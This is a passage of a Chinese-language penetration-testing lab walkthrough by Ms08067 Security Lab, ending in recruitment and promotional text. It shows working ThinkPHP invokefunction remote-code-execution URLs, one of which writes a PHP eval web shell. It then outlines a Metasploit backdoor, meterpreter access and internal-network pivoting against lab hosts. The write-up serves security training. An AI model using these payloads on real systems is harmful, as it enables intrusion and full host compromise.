/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://192.168.222.130/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > cmd.php

5、上传后，通过蚁剑进行连接，发现并不能成功连接。发现是$_POST被过滤了，这里可以利用编码（如Base64、URL）后再次上传。

6、用蚁剑进行连接，成功连接。此时已经获取到该主机的shell，可以查看系统的信息等。如下图所示：

??成功获得shell

??查看系统信息

7、根据攻击机的IP地址及目标靶机的系统类型生成对应的后门文件 ，如下图所示：

??查看攻击机IP

??制作后门

8、在kali中配置运行监听模块，如下图所示：

??msf设置监听

9、通过蚁剑将后门文件shell.elf上传到靶机中，并赋予777权限以执行，如下图所示：

??上传shell.elf后门文件

??赋予777权限执行

10、获得 meterpreter，如下图所示

??获得meterpreter

11、查看可用网段，如下图所示

??查看可用网段

12、发现两个网段：一个是192.168.2.0/24，另一个是192.168.222.0/24，通过meterpreter对192.168.222.0/24添加第二层的路由，如下图所示

??添加第二层路由

13、添加成功后进行内网扫描，查看内网中存活的主机，如下图所示

??查看存活主机

14、发现第二层靶机192.168.222.128，如下图所示

??出现第二层网址

15、在MSF中设置代理

??设置代理

通过设置代理，进行下一步的内网渗透

四、引用文章

??https://www.anquanke.com/post/id/170649

?
?
?

招新

微信联系方式：cos2606596924
满足以下要求均可尝试
1.至少会一门编程语言
2.漏洞平台上提交过漏洞超过20个
3.每月一文章分享(考虑有些要上班)?
?
?
?
?

转载请联系作者并注明出处！

Ms08067安全实验室专注于网络安全知识的普及和培训。团队已出版《Web安全攻防：渗透测试实战指南》，《内网安全攻防：渗透测试实战指南》，《Python安全攻防：渗透测试实战指南》，《Java代码安全审计（入门篇）》等书籍。
团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货，从零开始、以实战落地为主，致力于做一个实用的干货分享型公众号。
官方网站：https://www.ms08067.com/

扫描下方二维码加入实验室VIP社区
加入后邀请加入内部VIP群，内部微信群永久有效！

??

??